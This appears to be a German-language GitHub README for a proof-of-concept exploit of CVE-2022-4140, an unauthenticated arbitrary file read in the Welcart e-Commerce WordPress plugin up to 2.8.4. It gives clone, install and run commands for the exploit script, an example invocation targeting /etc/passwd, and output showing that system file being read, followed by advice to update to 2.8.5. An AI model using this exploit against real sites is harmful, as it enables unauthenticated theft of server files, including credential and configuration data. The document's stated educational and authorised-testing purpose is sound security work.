
WordPress-Plugin Welcart e-Commerce < 2.8.5 – Beliebiger Dateizugriff (Arbitrary File Read)
Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2022-4140.
Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.
Das Plugin validiert Benutzereingaben nicht, bevor es sie zum Ausgeben des Inhalts einer Datei verwendet, was es einem nicht authentifizierten Angreifer ermöglichen könnte, beliebige Dateien auf dem Server zu lesen.
| Komponente | Version |
|---|
| Verwundbares Plugin | <=2.8.4 |
| Gepatchtes Plugin | 2.8.5 |
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt
python exploit.py <base_url> -f <Dateipfad> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd
[*] Prüfe, ob das Ziel verwundbar ist
[+] Plugin-Version erkannt: 2.8.4
[+] Das Ziel ist verwundbar
[*] Versuche, eine beliebige Datei zu lesen
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Aktualisieren Sie das Plugin auf Version 2.8.5.